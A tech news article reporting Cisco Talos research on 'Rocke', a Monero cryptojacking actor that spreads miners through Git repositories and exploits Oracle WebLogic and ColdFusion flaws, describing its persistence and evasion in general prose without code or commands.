Rocke, the New Monero Cryptojacking Malware on the Block

Rocke the New Monero Cryptojacking Malware on the Block

Cryptocurrency mining malware, also known as Cryptojacking has steadily stolen the spotlight from ransomware from last year. It is a form of malware with the goal of mining cryptocurrency for its author using the CPU and GPU cycles of the victim computer. The loudness of a ransomware infection (when the malware needs to announce its existence to the user to solicit a ransom payment) is far from the silence of a crytojacking infection. Cryptojacking needs time and stolen processing cycles to effectively mine crypto-coins for its authors.

As reported by Cisco in their official blog, Git repositories are being targeted by a Monero cryptojacking malware known as ‘Rocke’ since April this year. Rocke is developed with vulnerable Http File servers and Git repositories in-mind, in its quest to mine Monero coins.

Chinese-speaking actor which we refer to as “Rocke” came to our attention. Rocke actively engages in distributing and executing cyrptomining malware using a varied toolkit that includes Git repositories, HttpFileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file “logo.jpg” from “3389[.]space.” This file is a shell script which, in turn, downloads mining executables from the threat actor’s Git repositories and saves them under the filename “java.” The exact file downloaded depends on the victim’s system architecture,” said David Liebensberg, Cisco’s Senior Threat Analyst in the blog.

The Rocke cryptojacking malware is considered by Cisco to be a work in progress, as more and more features are added in every new variant.We will examine several of Rocke’s campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors,” added Liebensberg.

From Cisco’s further analysis, they have found-out that two particular known vulnerabilities are currently being exploited by the Rocke’s payload: CVE-2017-10271 and CVE-2017-3066. The former is all about an Oracle WebLogic server vulnerability, while the latter pertains to an Adobe Coldfusion Java deserialization flaw. Embedded in the Rocke’s code is a copy of TermsHost.exe, a well-known Monero coin mining module, which anyone can buy for $14.  The monero coin mining module is tweaked by the virus authors in order to perform hashes during the machine’s idle periods. This lessens the chances of users recognizing that there is a problem with the machine during its busy periods. Rocke also hijacks the registry startup entry in order to launch itself on the background automatically after a reboot, and create a loophole in the Windows firewall to allow incoming and outgoing traffic from Rocke to its Command and Control Servers.

Cisco Talos assesses with high confidence that Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines. It is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware. Besides noisy scan-and-exploit activity, it appears that Rocke is likely also pursuing social engineering as a new infection vector, as demonstrated by the repositories involving fake Adobe Flash and Google Chrome updates,” concluded Liebensberg.


Leave a Comment


Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password